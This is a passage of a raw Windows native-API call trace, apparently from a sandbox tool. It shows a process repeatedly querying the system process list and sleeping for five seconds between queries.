ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.339] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.350] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.354] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.362] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.364] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.370] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.379] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.380] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.388] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.400] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.407] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.409] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.437] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.453] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.458] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.477] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 